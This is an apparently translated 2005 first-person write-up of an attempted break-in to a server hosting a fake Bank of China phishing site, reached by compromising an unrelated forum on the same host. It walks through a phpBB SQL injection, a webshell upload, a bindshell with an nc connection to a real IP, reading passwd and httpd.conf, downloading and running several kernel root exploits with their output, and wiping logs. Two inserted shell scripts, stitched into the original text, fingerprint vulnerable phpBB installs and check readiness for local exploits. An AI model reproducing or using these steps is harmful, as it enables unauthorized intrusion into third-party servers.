Intrusion attempt against a fake Bank of China website (www.banochi.net)

Source: Internet
Author: AKO
Tags: upload, php

http://www.coolersky.com/

I had not planned to write up this unsuccessful intrusion, but a few friends wanted to see it, and since it was only going to circulate internally there was nothing to hide. So here it is; beginners may learn something from it, and I hope to learn more myself.
On the evening of the 27th I saw a report from tianyao:

Bank of China website once again cloned by a fake site in North America

This site's repost of the story:
http://www.coolersky.com/web/news/20050228014041.asp
I had to look into it. Since that is how things stand, let's take a look. Enough talk, let's start!
1. Collect information

Server information:
Apache/1.3.33
PHP/4.3.9
Main website file:
http://www.banochi.net/english/index.shtml
Looking at the fake site itself there is basically nothing usable; presumably it consists of nothing but CGI programs that record passwords and IP addresses. Besides going after the server directly, other approaches can also be considered.
I searched the other sites on the same host and analysed several PHP sites for injection, but they did not offer much. Then I thought of the phpBB hole, wrote a bit of code to search for viewtopic.php files, and found a phpBB 2.0.10 installation to use as the entry point:
http://www.bits-clsu.org/forum/viewtopic.php?t=1
Afterwards I remembered that I could simply have used a side-site (shared-host neighbour) lookup tool to search directly; it comes to the same thing.
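The fingerprinting step above, as an added shell example that is not part of the original post: it pulls the version out of the copyright footer of a saved viewtopic.php page and flags anything at or below 2.0.10, the version found here. The footer markup used in the constructed sample pages is an assumption about the phpBB 2.0.x template, and the 2.0.10 cut-off comes from this post rather than from any changelog, so a "newer" result only means "newer than the release exploited here".

```shell
#!/bin/sh
# Added example, not code from the original post: fingerprint a phpBB 2.0.x
# install from the copyright footer of a saved page and flag releases at or
# below 2.0.10 (the version the writeup found). The footer markup is an
# assumed shape of the 2.0.x template; the sample pages below are constructed.

# Print the "X.Y.Z" that follows "phpBB</a>" in the footer of file $1,
# or nothing if no footer is present.
phpbb_version() {
    sed -n 's/.*phpBB<\/a> \([0-9][0-9.]*\).*/\1/p' "$1" | head -n 1
}

# Numeric comparison of dotted versions: returns 0 if $1 <= $2.
version_le() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        x="${a%%.*}"; y="${b%%.*}"
        [ -n "$x" ] || x=0
        [ -n "$y" ] || y=0
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
        case "$a" in *.*) a="${a#*.}" ;; *) a="" ;; esac
        case "$b" in *.*) b="${b#*.}" ;; *) b="" ;; esac
    done
    return 0
}

# Classify a saved page: prints "vulnerable <ver>" (returns 0),
# "newer <ver>" (returns 1) or "unknown" (returns 2).
classify_phpbb() {
    v="$(phpbb_version "$1")"
    if [ -z "$v" ]; then
        echo "unknown"; return 2
    elif version_le "$v" 2.0.10; then
        echo "vulnerable $v"; return 0
    else
        echo "newer $v"; return 1
    fi
}

# Constructed sample pages (not captured from any real site).
sample_old="$(mktemp)"; sample_new="$(mktemp)"; sample_none="$(mktemp)"
cat > "$sample_old" <<'EOF'
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_phpbb" class="copyright">phpBB</a> 2.0.10 &copy; 2001, 2002 phpBB Group</span>
EOF
cat > "$sample_new" <<'EOF'
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_phpbb" class="copyright">phpBB</a> 2.0.11 &copy; 2001, 2002 phpBB Group</span>
EOF
printf '<html><body>no forum here</body></html>\n' > "$sample_none"

for f in "$sample_old" "$sample_new" "$sample_none"; do
    classify_phpbb "$f" || true
done
```

Pointed at real saved pages, the same three functions work over a list of virtual hosts found on the shared server; the version comparison is done numerically rather than as a string so that 2.0.9 sorts below 2.0.10.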
2. Upload the Trojan

Using the phpBB hole (see the write-ups "phpBB Remote Arbitrary SQL Injection Vulnerability" and "phpBB SQL Injection Vulnerability Analysis"), I uploaded a PHP webshell.
3. Generate a bindshell
While I was still reading through files, Edward had already built a bindshell! Basic method:
upload bindshell.c
gcc -o /tmp/bind bindshell.c
/tmp/bind

Then connect with nc and have a look; it is more convenient to work in a shell.
nc -vv 216.22.48.72 7758

4. Collect system information
After obtaining the webshell you can gather some basic information, including passwd and httpd.conf, and retrieve the absolute path of the fake website: /home/banochin/public_html/. In the webshell the file creation times on the server can be seen. Its cgi-bin directory contains the following files:
File            Last modified  Created   Size        Mode
[member]        21:39:03       21:39:03  -           0700
errlog.dat      00:32:22       00:32:22  140.186 kb  0600
id.dat          10:48:35       10:48:35  1.727 kb    0600
index.htm       03:19:51       03:19:51  0.697 kb    0644
pwd.dat         00:36:15       00:36:15  0.170 kb    0600
pwdbak.dat      03:24:17       03:19:55  0.516 kb    0600
security.cgi    03:24:03       03:20:00  44.363 kb   0700
visemailer.cgi  03:24:04       03:20:02  3.554 kb    0700

You can see that the password files are dated July 22 and February 25. Browsing the directory, I found that the Bank of China site's content in several other languages is also present, but it is basically all HTML, which must have been dumped straight from the Bank of China website.
Kernel information (we have no write permission on its directory, so the next thing to do is escalate privileges; everything up to this point took about an hour, while the privilege escalation took me more than a day and still did not succeed, which was depressing!):
uname -r
2.4.20-021stab022.11.777-enterprise

5. Local privilege escalation tests

Add to the environment variable:
export PATH=/usr/bin:$PATH
Otherwise the error "collect2: cannot find 'ld'" appears!
(1) Linux kernel moxa serial driver BSS overflow vulnerability
grsecurity 2.1.0 release / 5 Linux kernel advisories
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
File:
http://grsecurity.net/~spender/exploits_and_patches.tgz
Test:
wget http://grsecurity.net/~spender/exploits_and_patches.tgz
tar -zxvf exploits_and_patches.tgz
cd exploits_and_patches
make alloc=0x100000
------------------------------------------------------------------------
nasm -f elf -dallocate=32482374 mlock-dos.S
make: nasm: Command not found
make: *** [all] Error 127
------------------------------------------------------------------------
Conclusion:
nasm is missing, and it cannot be installed even by uploading the RPM!
(2) Linux kernel uselib() privilege escalation vulnerability
Linux Kernel sys_uselib Local Root Vulnerability
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
http://isec.pl/vulnerabilities/isec-0021-uselib.txt
File:
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
Test:
gcc -O2 -fomit-frame-pointer elflbl_v108.c -o elflbl_v108
------------------------------------------------------------------------
elflbl_v108.c: In function 'check_vma_flags':
elflbl_v108.c:545: warning: deprecated use of label at end of compound statement
------------------------------------------------------------------------
./elflbl_v108
------------------------------------------------------------------------
child 1 VMAs 0
[+] moved stack bff73000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000-0xcf707000
Wait... Segmentation fault
------------------------------------------------------------------------
gcc -O2 -fomit-frame-pointer elflbl_v109.c -o elflbl_v109
./elflbl_v109
------------------------------------------------------------------------
[+] slab cleanup
[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)
sh: line 9: 24080 Killed ./elflbl_v109
------------------------------------------------------------------------
(3) Linux kernel local integer overflow and memory leak vulnerabilities
Fun Linux Kernel
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
Test:
gcc -o vc_resize vc_resize.c
./vc_resize
------------------------------------------------------------------------
open: No such device or address
------------------------------------------------------------------------
gcc memory_leak.c -o memory_leak
------------------------------------------------------------------------
memory_leak.c:80:2: warning: no newline at end of file
------------------------------------------------------------------------
(4) Linux kernel do_mremap VMA local privilege escalation vulnerability
Linux Kernel do_mremap VMA Limit Local Privilege Escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=%CC%E1%C9%FD
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
File:
http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
Test:
gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
./mremap_pte
------------------------------------------------------------------------
[+] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000-0x50bfb000
[-] FAILED
------------------------------------------------------------------------
(5) Linux kernel kmod/ptrace race condition privilege escalation vulnerability

Linux kmod/ptrace bug - details
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=%CC%E1%C9%FD
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
File:
http://august.v-lo.krakow.pl/~anszom/km3.c
Test:
gcc -o km3 km3.c
./km3 ?
------------------------------------------------------------------------
usage: ./km3 [-d] [-b] [-r] [-s] [-c executable]
-d -- use double-ptrace method (to run interactive programs)
-b -- start bindshell on port 4112
-r -- support randomized PIDs
-c -- choose executable to start
-s -- single-shot mode: abort if unsuccessful at the first try
------------------------------------------------------------------------
./km3 -s
------------------------------------------------------------------------
Linux kmod + ptrace local root exploit
=> Simple mode, executing /usr/bin/id >/dev/tty
sizeof(shellcode)=95
=> Child process started..........
Failed
------------------------------------------------------------------------

(6) Linux kernel i386 SMP page fault handler privilege escalation vulnerability
Linux Kernel i386 SMP Page Fault Handler Privilege Escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
Test:
gcc -o smp smp.c
./smp
------------------------------------------------------------------------
[+] in thread 1 (pid=5400)
[+] in thread 2 (pid=5401)
[+] rdtsc calibration: 53428
[+] exploiting race, wait...
[-] unable to exploit race in 30 s,
    kernel patched or load too high.
------------------------------------------------------------------------
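A pre-flight check of the environment before spending a day on local kernel exploits, as an added example that is not part of the original post. It tests for the blockers that section 5 actually ran into (ld not reachable on PATH, nasm missing, /proc/slabinfo unreadable, a single CPU or high load for the race-based exploits) and reports the kernel release; it does not judge whether any particular exploit applies. The /proc/cpuinfo fragment is constructed so that cpu_count can be exercised offline. One caveat worth keeping in mind when reading the release string: a suffix such as 021stab022.11.777-enterprise marks a vendor build, so the upstream version number alone says little about which fixes have been backported.

```shell
#!/bin/sh
# Added example, not code from the original post: pre-flight triage for a
# low-privilege shell before attempting local kernel exploits. Checks the
# blockers hit in section 5 of the writeup; it does not assess exploitability.

kernel_release() { uname -r; }

# Returns 0 if directory $1 appears in the PATH-style string $2.
path_has_dir() {
    case ":$2:" in *":$1:"*) return 0 ;; *) return 1 ;; esac
}

# Returns 0 if a command named $1 is executable via the current PATH.
has_tool() { command -v "$1" >/dev/null 2>&1; }

# Returns 0 if file $1 is readable (e.g. /proc/slabinfo).
is_readable() { [ -r "$1" ]; }

# Prints the number of "processor" entries in a cpuinfo file $1, or 0 if it
# cannot be read; taking the path as a parameter lets it run on a sample.
cpu_count() {
    if is_readable "$1"; then grep -c '^processor' "$1"; else echo 0; fi
}

# Runs every check, prints one line per item and returns the number of
# hard blockers found (CPU count and load are advisory only).
preflight() {
    blockers=0
    echo "kernel: $(kernel_release)"
    path_has_dir /usr/bin "$PATH" && echo "ok      /usr/bin on PATH" \
        || { echo "MISSING /usr/bin on PATH (collect2: cannot find 'ld')"; blockers=$((blockers + 1)); }
    for t in gcc ld nasm wget; do
        has_tool "$t" && echo "ok      $t" \
            || { echo "MISSING $t"; blockers=$((blockers + 1)); }
    done
    is_readable /proc/slabinfo && echo "ok      /proc/slabinfo readable" \
        || { echo "MISSING /proc/slabinfo (slab-dependent exploits abort)"; blockers=$((blockers + 1)); }
    n=$(cpu_count /proc/cpuinfo)
    [ "$n" -ge 2 ] && echo "ok      $n CPUs" \
        || echo "note    $n CPU(s): SMP race exploits need at least 2"
    echo "load:   $(cut -d' ' -f1-3 /proc/loadavg 2>/dev/null || echo unknown)"
    return "$blockers"
}

# Constructed two-CPU /proc/cpuinfo fragment (not captured from any host).
sample_cpuinfo="$(mktemp)"
printf 'processor\t: 0\nmodel name\t: x\n\nprocessor\t: 1\nmodel name\t: x\n' > "$sample_cpuinfo"

preflight || echo "$? blocker(s) found"
```

Run it once from the webshell (or bindshell) before uploading any exploit source; when it reports blockers, fixing the PATH or uploading a static binary built elsewhere is usually faster than fighting the target's toolchain.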

Several local privilege escalation attempts, all failed! Very depressing! While I was testing, the fake website was shut down. Although the files are still there, the official side has clearly put in a lot of effort and got good results.
6. Others
I found a few more Linux exploits, but they all require root. As for the server, remote access is over SSH, so a sniffer would presumably be useless too. I have no further ideas for the moment, so I cleaned up the exploits and log files.
The above are some of my test results. I did not get root, but I have sorted out the relevant vulnerabilities for future reference. I posted the results in the webmaster group and nobody answered; I don't know whether everyone is just too busy...
This article does not go into the vulnerabilities and results in any special depth; they can be used directly if you are interested, but there is no need to make trouble for other sites. I hope you understand what I mean!
After all this time there is still a lot of work to do! I hope the boss won't tell me off, heh heh!
Finally, I would like to thank Edward, la, and some of our colleagues!
This article may be reproduced freely, but please indicate the source; in particular, neither the whole nor any part of it may be used for any commercial or paid purpose. Thank you!
